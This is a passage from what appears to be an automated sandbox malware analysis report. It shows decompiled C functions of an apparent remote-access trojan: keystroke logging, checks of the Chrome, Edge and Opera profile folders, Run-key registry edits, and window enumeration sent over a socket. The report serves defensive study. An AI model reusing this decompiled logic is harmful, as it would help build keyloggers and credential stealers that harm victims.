					_t2 =  &_a4; // 0x4433eb
					 *0x4574c8( *_t2);
					 *_t18();
				}
				return E004338BB(_v8 ^ _t20);
			}







                    0x00447366
                    0x0044736b
                    0x0044736c
                    0x00447373
                    0x00447376
                    0x0044738d
                    0x00447394
                    0x004473a9
                    0x004473b2
                    0x00447396
                    0x00447396
                    0x0044739b
                    0x004473a1
                    0x004473a1
                    0x004473c6

                    APIs
                    • IsValidLocale.KERNEL32(00000000,3D,00000000,00000001,?,?,004433EB,?,?,00442DCB,?,00000004), ref: 004473B2
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocaleValid
                    • String ID: IsValidLocaleName$3D
                    • API String ID: 1901932003-2077415542
                    • Opcode ID: dbdf72e8e2661f57c780aa44d4f8bbb8f5dee09d7a0af35499866a64bb157ce1
                    • Instruction ID: 1aafa65fd00d6e25da83e5a77131e27d47e67d355686313c1ce54cf128189aa6
                    • Opcode Fuzzy Hash: dbdf72e8e2661f57c780aa44d4f8bbb8f5dee09d7a0af35499866a64bb157ce1
                    • Instruction Fuzzy Hash: 25F0B430A84608B7E7106B219C06FAD7B54CF05712F10416AFD056A282DA795E0295ED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040BA3D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040BA3D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				char _v28;
				void* __ebp;
				int _t10;
				void* _t22;
				void* _t25;
				void* _t26;
				void* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t16 = __ebx;
				_t26 = __ecx;
				E0040415E(__ebx,  &_v28, __edx, _t27, E0043A99F(__ebx, __ecx, __eflags, L"UserProfile"));
				L004086C6(__ebx,  &_v28, _t25, _t27, L"\\AppData\\Local\\Google\\Chrome\\");
				_t10 = PathFileExistsW(E00401EE4( &_v28));
				_t22 = _t26;
				_t29 = _t10;
				if(_t10 == 0) {
					E0040415E(_t16, _t22, _t24, _t27, 0x46a8f0);
				} else {
					E00403242(_t16, _t22, _t27, _t29,  &_v28);
				}
				E00401EE9();
				return _t26;
			}










                    0x0040ba3d
                    0x0040ba3d
                    0x0040ba3d
                    0x0040ba49
                    0x0040ba55
                    0x0040ba62
                    0x0040ba70
                    0x0040ba76
                    0x0040ba78
                    0x0040ba7a
                    0x0040ba8c
                    0x0040ba7c
                    0x0040ba80
                    0x0040ba80
                    0x0040ba94
                    0x0040ba9f

                    APIs
                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,0040BB7D,?), ref: 0040BA70
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                    • API String ID: 1174141254-4188645398
                    • Opcode ID: df02a31d2a134d3526654c6d02b04815e03758211aaf3e703098bf13df4c2d63
                    • Instruction ID: fa1b3df0c65eba921df0d08a7c52afbe64c16d4fabbb7ff89d5955b2db38ff16
                    • Opcode Fuzzy Hash: df02a31d2a134d3526654c6d02b04815e03758211aaf3e703098bf13df4c2d63
                    • Instruction Fuzzy Hash: D0F08230A0131AA6CA14FBE6DC478FF7B6CCD10754B10007FBA01B22D2EE79994586DE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040BAA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040BAA0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				char _v28;
				void* __ebp;
				int _t10;
				void* _t22;
				void* _t25;
				void* _t26;
				void* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t16 = __ebx;
				_t26 = __ecx;
				E0040415E(__ebx,  &_v28, __edx, _t27, E0043A99F(__ebx, __ecx, __eflags, L"UserProfile"));
				L004086C6(__ebx,  &_v28, _t25, _t27, L"\\AppData\\Local\\Microsoft\\Edge\\");
				_t10 = PathFileExistsW(E00401EE4( &_v28));
				_t22 = _t26;
				_t29 = _t10;
				if(_t10 == 0) {
					E0040415E(_t16, _t22, _t24, _t27, 0x46a8f0);
				} else {
					E00403242(_t16, _t22, _t27, _t29,  &_v28);
				}
				E00401EE9();
				return _t26;
			}










                    0x0040baa0
                    0x0040baa0
                    0x0040baa0
                    0x0040baac
                    0x0040bab8
                    0x0040bac5
                    0x0040bad3
                    0x0040bad9
                    0x0040badb
                    0x0040badd
                    0x0040baef
                    0x0040badf
                    0x0040bae3
                    0x0040bae3
                    0x0040baf7
                    0x0040bb02

                    APIs
                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040BC46), ref: 0040BAD3
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                    • API String ID: 1174141254-2800177040
                    • Opcode ID: 43e026a29818edc11a7be37543c8696e5582a545669cfc76fe33ec9397202786
                    • Instruction ID: e51b4f52c028d78bdf66c263ab0f3750d3580a43710b0836be6e4890ee81e12e
                    • Opcode Fuzzy Hash: 43e026a29818edc11a7be37543c8696e5582a545669cfc76fe33ec9397202786
                    • Instruction Fuzzy Hash: 5CF08231A0121A96CA14F7E6DC478FF7B6CCD10718B00007FBA01B22D2EE799941C6DE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040BB03 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040BB03(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				char _v28;
				void* __ebp;
				int _t10;
				void* _t22;
				void* _t25;
				void* _t26;
				void* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t16 = __ebx;
				_t26 = __ecx;
				E0040415E(__ebx,  &_v28, __edx, _t27, E0043A99F(__ebx, __ecx, __eflags, L"AppData"));
				L004086C6(__ebx,  &_v28, _t25, _t27, L"\\Opera Software\\Opera Stable\\");
				_t10 = PathFileExistsW(E00401EE4( &_v28));
				_t22 = _t26;
				_t29 = _t10;
				if(_t10 == 0) {
					E0040415E(_t16, _t22, _t24, _t27, 0x46a8f0);
				} else {
					E00403242(_t16, _t22, _t27, _t29,  &_v28);
				}
				E00401EE9();
				return _t26;
			}










                    0x0040bb03
                    0x0040bb03
                    0x0040bb03
                    0x0040bb0f
                    0x0040bb1b
                    0x0040bb28
                    0x0040bb36
                    0x0040bb3c
                    0x0040bb3e
                    0x0040bb40
                    0x0040bb52
                    0x0040bb42
                    0x0040bb46
                    0x0040bb46
                    0x0040bb5a
                    0x0040bb65

                    APIs
                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040BCA9), ref: 0040BB36
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: AppData$\Opera Software\Opera Stable\
                    • API String ID: 1174141254-1629609700
                    • Opcode ID: 06cae4c088094239c365531e9643b3e3e720c76cc8f8992ae3a60d6439a42d0e
                    • Instruction ID: e6a7174926e5e3b4842ccf786cfde627425bba0d2052536d9f30216573a1e43c
                    • Opcode Fuzzy Hash: 06cae4c088094239c365531e9643b3e3e720c76cc8f8992ae3a60d6439a42d0e
                    • Instruction Fuzzy Hash: 78F05E30A0021996CA14F7A2DC479FFBB6C9910718B10047FBA01B31D2EE799981C6EE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040ABBC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                    Download Yara Rule
                    C-Code - Quality: 64%
                    			E0040ABBC(void* __ebx, void* __ecx, void* __edx) {
				void* _t4;
				void* _t7;
				void* _t10;
				signed int _t12;
				void* _t13;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;

				_t17 = __edx;
				_t10 = __ebx;
				_t18 = __ecx;
				_t12 = GetKeyState(0x11) & 0x0000ffff;
				_t4 =  *((intOrPtr*)(_t18 + 0x4c)) - 0xa4;
				if(_t4 == 0) {
					_t13 = _t20 - 0x18;
					_push("[AltL]");
					L6:
					E00402073(_t10, _t13, _t17, _t19);
					return E00409B84(_t18);
				}
				_t7 = _t4 - 1;
				if(_t7 == 0) {
					if(_t12 == 0) {
						_t13 = _t20 - 0x18;
						_push("[AltR]");
						goto L6;
					}
					return _t7;
				} else {
					E004099E3(_t18, _t20 - 0x18);
					return E00409BA9(_t18);
				}
			}












                    0x0040abbc
                    0x0040abbc
                    0x0040abbf
                    0x0040abc7
                    0x0040abcd
                    0x0040abd2
                    0x0040ac01
                    0x0040ac03
                    0x0040ac08
                    0x0040ac08
                    0x00000000
                    0x0040ac0f
                    0x0040abd4
                    0x0040abd7
                    0x0040abf0
                    0x0040abf5
                    0x0040abf7
                    0x00000000
                    0x0040abf7
                    0x0040ac15
                    0x0040abd9
                    0x0040abdf
                    0x0040abec
                    0x0040abec

                    APIs
                    • GetKeyState.USER32(00000011), ref: 0040ABC1
                      • Part of subcall function 004099E3: GetForegroundWindow.USER32(00000000,?,00000000), ref: 00409A17
                      • Part of subcall function 004099E3: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409A22
                      • Part of subcall function 004099E3: GetKeyboardLayout.USER32 ref: 00409A29
                      • Part of subcall function 004099E3: GetKeyState.USER32(00000010), ref: 00409A33
                      • Part of subcall function 004099E3: GetKeyboardState.USER32(?), ref: 00409A40
                      • Part of subcall function 004099E3: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409A5C
                      • Part of subcall function 00409BA9: SetEvent.KERNEL32(?,?,00000000,0040A780,00000000), ref: 00409BD5
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                    • String ID: [AltL]$[AltR]
                    • API String ID: 3195419117-2658077756
                    • Opcode ID: df627bc4a743b575a74da755f13919b46736de9882ceb998d69cc3f9b2f42ba8
                    • Instruction ID: 96eefd13142f1eb0f51443313c58276a15165e9a298fe6b1d87f9ff32337ecc9
                    • Opcode Fuzzy Hash: df627bc4a743b575a74da755f13919b46736de9882ceb998d69cc3f9b2f42ba8
                    • Instruction Fuzzy Hash: 9AE0652170431017C918323E691BA7E392197C2774B40016FF9467B6D7D8BE9D5193CF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040AC16 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                    Download Yara Rule
                    C-Code - Quality: 67%
                    			E0040AC16(void* __ebx, void* __ecx) {
				void* _t4;
				void* _t7;
				signed int _t9;
				void* _t10;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t15;

				_t7 = __ebx;
				_t13 = __ecx;
				_t9 = GetKeyState(0x12) & 0x0000ffff;
				_t4 =  *((intOrPtr*)(_t13 + 0x4c)) - 0xa2;
				if(_t4 == 0) {
					if(_t9 == 0) {
						_t10 = _t15 - 0x18;
						_push("[CtrlL]");
						goto L5;
					}
				} else {
					_t4 = _t4 - 1;
					if(_t4 == 0) {
						_t10 = _t15 - 0x18;
						_push("[CtrlR]");
						L5:
						E00402073(_t7, _t10, _t12, _t14);
						return E00409B84(_t13);
					}
				}
				return _t4;
			}











                    0x0040ac16
                    0x0040ac19
                    0x0040ac21
                    0x0040ac27
                    0x0040ac2c
                    0x0040ac42
                    0x0040ac47
                    0x0040ac49
                    0x00000000
                    0x0040ac49
                    0x0040ac2e
                    0x0040ac2e
                    0x0040ac31
                    0x0040ac36
                    0x0040ac38
                    0x0040ac4e
                    0x0040ac4e
                    0x00000000
                    0x0040ac55
                    0x0040ac31
                    0x0040ac5b

                    APIs
                    • GetKeyState.USER32(00000012), ref: 0040AC1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: State
                    • String ID: [CtrlL]$[CtrlR]
                    • API String ID: 1649606143-2446555240
                    • Opcode ID: 707982bc91fbbbd2a636e6f7f8ab650285e34d35857256a952e1c03f309ecd73
                    • Instruction ID: 5068e35745fff1d0ae311e30ec864f18ca5ee1bac8daf42aff9a91bbfa6ecc8a
                    • Opcode Fuzzy Hash: 707982bc91fbbbd2a636e6f7f8ab650285e34d35857256a952e1c03f309ecd73
                    • Instruction Fuzzy Hash: E5E08621B0831017D924353F5A1E67A3910A7917A0F41027FF9426B6C6E87E8D2062CF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040DCA3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040DCA3() {
				void* __esi;

				if( *0x474a68 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E00432CF1(0x474a68);
					_t17 =  *0x474a68 - 0xffffffff;
					if( *0x474a68 == 0xffffffff) {
						E0041074B();
						E0043307B(_t17, 0x456962);
						E00432CB2(0x474a68, 0x474a68);
					}
				}
				return 0x474a6c;
			}




                    0x00410444
                    0x0041044d
                    0x00410452
                    0x0041045a
                    0x0041045c
                    0x00410466
                    0x0041046c
                    0x00410472
                    0x00410473
                    0x00410479

                    APIs
                      • Part of subcall function 0043307B: __onexit.LIBCMT ref: 00433081
                    • __Init_thread_footer.LIBCMT ref: 0041046C
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Init_thread_footer__onexit
                    • String ID: hJG$lJG
                    • API String ID: 1881088180-3986032958
                    • Opcode ID: 3098f39f6e044b7fe1c83a17937fea0626eb8e384405a203024fdf0746d1f617
                    • Instruction ID: 959a6744f9fea07c9b6c9e8e76648da5020df6129c556cb91e4ae22f1d5d63cc
                    • Opcode Fuzzy Hash: 3098f39f6e044b7fe1c83a17937fea0626eb8e384405a203024fdf0746d1f617
                    • Instruction Fuzzy Hash: 8DE0D8310415108AC110A71895829E933589B88325B61912FF904976918BAC19C1C75F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00412D0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 58%
                    			E00412D0B(void* __ecx, short* __edx, short* _a4) {
				void* _v8;
				signed int _t6;

				_push(__ecx);
				if(RegOpenKeyExW(__ecx, __edx, 0, 2,  &_v8) == 0) {
					_t6 = RegDeleteValueW(_v8, _a4);
					asm("sbb al, al");
					return  ~_t6 + 1;
				}
				return 0;
			}





                    0x00412d0e
                    0x00412d21
                    0x00412d2d
                    0x00412d35
                    0x00000000
                    0x00412d37
                    0x00000000

                    APIs
                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C64D,00000000,00473220,00473238,?,pth_unenc), ref: 00412D19
                    • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412D2D
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412D17
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteOpenValue
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                    • API String ID: 2654517830-1051519024
                    • Opcode ID: 73d02ef1f0cc626344373e057ae6400ba39a732c9e2669238d64bd595eb6c070
                    • Instruction ID: 31757409137fc2aa28e21d2d38410cee3dd97c0c89aa87a52c5bf8b2ac0ec4d3
                    • Opcode Fuzzy Hash: 73d02ef1f0cc626344373e057ae6400ba39a732c9e2669238d64bd595eb6c070
                    • Instruction Fuzzy Hash: D6E0C27124820CBBEF104F71EE06FFB376CEB01F01F1002A5B90592191C66ADA149664
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004167F1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                    Download Yara Rule
                    C-Code - Quality: 73%
                    			E004167F1(void* __ebx) {
				void* _t1;
				void* _t5;
				void* _t10;
				void* _t12;

				_t14 =  *0x470d61;
				if( *0x470d61 == 0) {
					 *0x470d61 = 1;
					EnumWindows(E004165EC, 0);
					E004020D6(__ebx, _t12 - 0x18, _t10, _t14, 0x473568);
					_push(0x63);
					E00404A81(0x4734e8, _t10, _t14);
					_t5 = L00405A86(__ebx, 0x473568, _t10, 0x464074);
					 *0x470d61 = 0;
					return _t5;
				}
				return _t1;
			}







                    0x004167f1
                    0x004167f9
                    0x00416802
                    0x00416809
                    0x0041681a
                    0x0041681f
                    0x00416826
                    0x00416832
                    0x00416837
                    0x00000000
                    0x00416837
                    0x0041683f

                    APIs
                    • EnumWindows.USER32(Function_000165EC,00000000), ref: 00416809
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnumWindowssend
                    • String ID: h5G$4G
                    • API String ID: 2535772952-2693735065
                    • Opcode ID: 52884c4969bdfee6880f4c9df27e618c44e04f8f173a2268bf4e2e0b4762a65e
                    • Instruction ID: 9fe717f4edf3aaa12838891801d990c24a3a4d72d66b7b51c9a4e32ebb080fb0
                    • Opcode Fuzzy Hash: 52884c4969bdfee6880f4c9df27e618c44e04f8f173a2268bf4e2e0b4762a65e
                    • Instruction Fuzzy Hash: 3FE080207C9350B6DB31B7697D0679D39064752B54F14007EB5043A3D2C6DD5581C7DE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00411D93 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00411D93() {
				int _t3;
				signed int _t6;

				 *0x470d4b = 0;
				_t3 = TerminateProcess( *0x470d64, 0);
				WaitForSingleObject( *0x470d64, 0xffffffff);
				return _t6 & 0xffffff00 | _t3 != 0x00000000;
			}





                    0x00411d9c
                    0x00411da3
                    0x00411db6
                    0x00411dbf

                    APIs
                    • TerminateProcess.KERNEL32(00000000,pth_unenc,0040EE0B), ref: 00411DA3
                    • WaitForSingleObject.KERNEL32(000000FF), ref: 00411DB6
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ObjectProcessSingleTerminateWait
                    • String ID: pth_unenc
                    • API String ID: 1872346434-4028850238
                    • Opcode ID: ad6d013055d9b0547f0538c52e8fbec790f1cdf5f70ab7e2b39207b65bdb286b
                    • Instruction ID: e19746668ad3e5a2aa3259df84083bc395050bd976cc2345e4ea1c63972d9be6
                    • Opcode Fuzzy Hash: ad6d013055d9b0547f0538c52e8fbec790f1cdf5f70ab7e2b39207b65bdb286b
                    • Instruction Fuzzy Hash: 58D0C93414A311EBD7310BA0BC08B043B68A715362F140271F42C512F1C7659494AA59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00433B7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                    Download Yara Rule
                    C-Code - Quality: 16%
                    			E00433B7E(intOrPtr _a4) {
				char _v16;
				char* _t11;
				char* _t14;
				void* _t17;

				_t11 =  &_v16;
				E00433B3D(_t11, _a4);
				E004379F6( &_v16,  &E0046C448);
				asm("int3");
				_t14 = _t11;
				asm("lock xadd [0x46f024], eax");
				if(1 == 0) {
					_t17 = 0x470060;
					do {
						E0043444B(_t17);
						_t17 = _t17 + 0x18;
					} while (_t17 < 0x470120);
				}
				return _t14;
			}







                    0x00433b84
                    0x00433b8a
                    0x00433b98
                    0x00433b9d
                    0x00433ba1
                    0x00433ba4
                    0x00433bac
                    0x00433baf
                    0x00433bb4
                    0x00433bb5
                    0x00433bba
                    0x00433bbe
                    0x00433bc6
                    0x00433bca

                    APIs
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433B8A
                      • Part of subcall function 00433B3D: std::exception::exception.LIBCONCRT ref: 00433B4A
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00433B98
                      • Part of subcall function 004379F6: RaiseException.KERNEL32(?,?,00433B7D,?,?,?,00000000,?,?,?,P@,00433B7D,?,0046C40C,00000000), ref: 00437A55
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                    • String ID: P@
                    • API String ID: 1586462112-676759640
                    • Opcode ID: be34dfb19e6d27ab7c593c9c32c23ad28ddfa9a66cdc613b31972520aea6299d
                    • Instruction ID: fee150121e0675781914aead59bbd43a186a04d22f31c7314f5b286c5f6f48c1
                    • Opcode Fuzzy Hash: be34dfb19e6d27ab7c593c9c32c23ad28ddfa9a66cdc613b31972520aea6299d
                    • Instruction Fuzzy Hash: D0C08CB4C0030CB7CB00FBE5C856E9DB73C9F08304F50852ABA5092082EB78A30987DA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0044DB8A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0044DB8A() {

				 *0x470a50 = GetCommandLineA();
				 *0x470a54 = GetCommandLineW();
				return 1;
			}



                    0x0044db90
                    0x0044db9b
                    0x0044dba2

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CommandLine
                    • String ID: X4
                    • API String ID: 3253501508-3309041210
                    • Opcode ID: eacc33f57547a3f8ec88c580fc28d683a1ab5a9404e9f1bc00239eb361e61a9c
                    • Instruction ID: 68c496257c7160e71493908100abf0d3b6607c74e499a62d46a4e25d18f99d2b
                    • Opcode Fuzzy Hash: eacc33f57547a3f8ec88c580fc28d683a1ab5a9404e9f1bc00239eb361e61a9c
                    • Instruction Fuzzy Hash: BFB00278806780CFC7409F74B91C5443BA0B668607B9465B5D81ED2B21E779C045DF28
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0043F561 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0043F561(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E004390B7(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E0043EEAD())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t56 = _t70 + 1;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E0043EEAD())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E00449490(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E0043EEAD())) = 0x16;
					return E0043A5BB() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}




























                    0x0043f561
                    0x0043f56a
                    0x0043f56f
                    0x0043f572
                    0x0043f576
                    0x0043f585
                    0x0043f588
                    0x0043f5a8
                    0x0043f5ad
                    0x0043f5b0
                    0x0043f5b2
                    0x0043f680
                    0x0043f686
                    0x0043f69b
                    0x0043f6a7
                    0x0043f6ad
                    0x0043f6af
                    0x0043f6be
                    0x0043f6be
                    0x0043f6be
                    0x0043f6c1
                    0x0043f6c1
                    0x0043f6c5
                    0x0043f6c7
                    0x0043f6ca
                    0x0043f6ca
                    0x0043f6ca
                    0x0043f6ca
                    0x00000000
                    0x0043f6d1
                    0x0043f6b6
                    0x00000000
                    0x0043f6b6
                    0x0043f688
                    0x0043f68b
                    0x0043f68e
                    0x0043f68e
                    0x0043f690
                    0x0043f691
                    0x0043f691
                    0x0043f695
                    0x00000000
                    0x0043f695
                    0x0043f5b8
                    0x0043f5be
                    0x0043f5eb
                    0x0043f5f7
                    0x0043f5fd
                    0x0043f5ff
                    0x00000000
                    0x00000000
                    0x0043f605
                    0x0043f60b
                    0x0043f60e
